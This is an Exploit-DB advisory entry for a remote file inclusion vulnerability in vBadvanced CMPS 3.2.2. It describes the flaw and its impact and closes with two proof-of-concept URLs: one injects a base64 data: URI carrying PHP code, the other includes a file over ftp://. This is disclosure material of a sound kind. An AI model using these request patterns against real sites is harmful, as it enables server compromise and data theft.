vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion

EDB-ID:

36628


Author:

PacketiK

Type:

webapps


Platform:

PHP

Date:

2012-01-25


source: https://www.securityfocus.com/bid/51672/info

vBadvanced CMPS is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to execute arbitrary local and remote scripts in the context of the affected application or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.

vBadvanced CMPS 3.2.2 is vulnerable; other versions may also be affected. 

http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4=

http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:pass@127.0.0.1/123.txt